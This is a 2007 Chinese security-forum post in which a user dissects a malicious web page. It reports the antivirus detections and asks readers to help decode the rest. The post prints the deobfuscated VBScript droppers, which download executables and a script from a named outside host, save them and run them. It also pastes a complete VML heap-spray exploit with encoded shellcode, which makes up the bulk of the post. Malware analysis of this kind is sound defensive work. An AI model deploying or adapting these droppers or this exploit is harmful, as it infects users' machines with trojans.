首先声明,本人是kis6.0.2.621,组策略禁止修改系统时间,主动防御只开行为和注册表,昨天中午的病毒库
结果没事,硬盘灯亮了一会,无任何提示(病毒库已经报了)
一进去会看到类似页面未找到的提示
查看源代码,看到最后部分- <script language="javascript" src="js.asp?id=204853053&logo=1"></script>
复制代码 而js.asp?id=204853053&logo=1的内容包含转意的脚本,动态写入页面,转意后为- <script language="VBScript>
- on error resume next
- Set df = document.createElement("object")
- df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
- str="Microsoft.XMLHTTP"
- Set x = df.CreateObject(str,"")
- a1="Ado"
- a2="db."
- a3="Str"
- a4="eam"
- str1=a1&a2&a3&a4
- str5=str1
- set S = df.createobject(str5,"")
- S.type = 1
- str6="GET"
- x.Open str6, "http://www.17173-map.com/yycx/ahd41d.exe", False
- x.Send
- fsssname1="c:\\wing.exe"
- set F = df.createobject("Scripting.FileSystemObject","")
- set tmp = F.GetSpecialFolder(2)
- S.open
- S.write x.responseBody
- S.savetofile fsssname1,2
- S.close
- set Q = df.createobject("Shell.Application","")
- </script>
- <html>
- <script language="VBScript>
- on error resume next
- Set df = document.createElement("object")
- df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
- str="Microsoft.XMLHTTP"
- Set x = df.CreateObject(str,"")
- a1="Ado"
- a2="db."
- a3="Str"
- a4="eam"
- str1=a1&a2&a3&a4
- str5=str1
- set S = df.createobject(str5,"")
- if Not Err.Number = 0 then
- err.clear
- document.write ("<iframe src=704.html width=0 height=0 >")
- else
- S.type = 1
- str6="GET"
- x.Open str6, "http://www.17173-map.com/hh/41/yt.vbs", False
- x.Send
- fsssname1="yt.vbs"
- set F = df.createobject("Scripting.FileSystemObject","")
- set tmp = F.GetSpecialFolder(2)
- fsssname1= F.BuildPath(tmp,fsssname1)
- S.open
- S.write x.responseBody
- S.savetofile fsssname1,2
- S.close
- set Q = df.createobject("Shell.Application","")
- Q.ShellExecute fsssname1,"","","o"&"pen",0
- end if
- </script>
- <head>
- <title></title>
- </head>
- <body>
- <script src='http://s100.cnzz.com/stat.php?id=386636&web_id=386636&show=pic' language='JavaScript' charset='gb2312'></script>
- </body></html>
复制代码 分析代码看到
脚本先尝试把http://www.17173-map.com/yycx/ahd41d.exe下载到c:\wing.exe并尝试运行
然后调用704.html,失败的话直接下载运行http://www.17173-map.com/hh/41/yt.vbs
最后,又调用js脚本http://s100.cnzz.com/stat.php?id=386636&web_id=386636&show=pic
第一ahd41d.exe昨天病毒库扫不出,今天病毒库报Trojan-Downloader.Win32.Delf.bif
第二个http://www.17173-map.com/hh/41/yt.vbs脚本就是5秒运行一次第一步生成的文件c:\wing.exe
第三个是调用中国站长联盟cnzz.com的脚本拿你的cookie的一些信息以及你机器的一些外部信息发送到http://bsl41.com.cn,应该是木马主人的空间,这样既提高自己主页排名,又能得到受害者信息
至于那个703.htm,,又包含转意脚本,晕,转意完后一看,还是转意脚本,晕晕,看了半天看不懂,晕晕晕
贴来大家分析吧,我无能为力了
注,直接贴,返回页面会让卡巴认为是攻击,所以替换所有尖括号。
- 〈!-- vml'exploit! --〉
- 〈html xmlns:v="urn:schemas-microsoft-com:vml"〉
- 〈head〉
- 〈object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"〉
- 〈/object〉
- 〈style〉
- v\:* { behavior: url(#VMLRender); }
- 〈/style〉
- 〈/head〉
- 〈body〉
- 〈script language="javascript"〉
- var shellcode = unescape("%u9090"+"%u9090"+
- "%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
- "%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
- "%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
- "%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
- "%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
- "%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
- "%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
- "%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
- "%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
- "%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
- "%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
- "%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
- "%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
- "%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
- "%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
- "%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
- "%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
- "%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
- "%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
- "%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
- "%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
- "%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
- "%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
- "%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
- "%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u3731%u3731" +
- "%u2d33%u616d%u2e70%u6f63%u2f6d%u7979%u7863%u612f" +
- "%u6468%u3134%u2e64%u7865%u0065");
- bigblock = unescape("%u0505%u0505");
- headersize = 20;
- slackspace = headersize+shellcode.length;
- while (bigblock.length〈slackspace) bigblock+=bigblock;
- fillblock = bigblock.substring(0, slackspace);
- block = bigblock.substring(0, bigblock.length-slackspace);
- while(block.length+slackspace〈0x40000) block = block+block+fillblock;
- memory = new Array();
- hh = memory;
- for (i=0;i〈350;i++) hh[i] = block + shellcode;
- 〈/script〉
- 〈v:rect style='width:120pt;height:80pt' fillcolor="red" 〉
- 〈v:recolorinfo recolorstate="t" numcolors="97612895"〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v/recolorinfo〉
- 〈/html〉
复制代码
[ 本帖最后由 新饭 于 2007-4-13 11:26 编辑 ] |